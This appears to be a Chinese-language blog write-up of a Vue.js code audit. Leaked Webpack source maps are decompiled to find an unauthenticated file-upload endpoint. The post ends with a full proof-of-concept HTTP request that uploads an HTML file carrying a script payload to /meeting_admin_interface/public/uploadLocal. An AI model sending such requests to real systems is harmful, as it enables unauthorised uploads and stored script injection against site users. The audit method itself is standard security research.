Vue.js代码审计 (Webpack打包js.map泄露导致)
·
Webpack
系统

插件识别框架

app.xxx.js 这个文件算是一个webpack打包的特征文件。
拼接app.xxjs.map下载文件

反编译

对接口进行审计,找未授权接口。

搜索/public/uploadLocal的代码

两个文件都使用了 /public/uploadLocal 接口

查看代码(前端代码)

这个接口没有做身份验证,对上传的文件类型也没有做验证
POC
POST /meeting_admin_interface/public/uploadLocal HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="folder"
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="file"; filename="1.html"
Content-Type: image/svg+xml
<script>alert(1)</script>
------WebKitFormBoundary7MA4YWxkTrZu0gW--
上传成功

更多推荐
所有评论(0)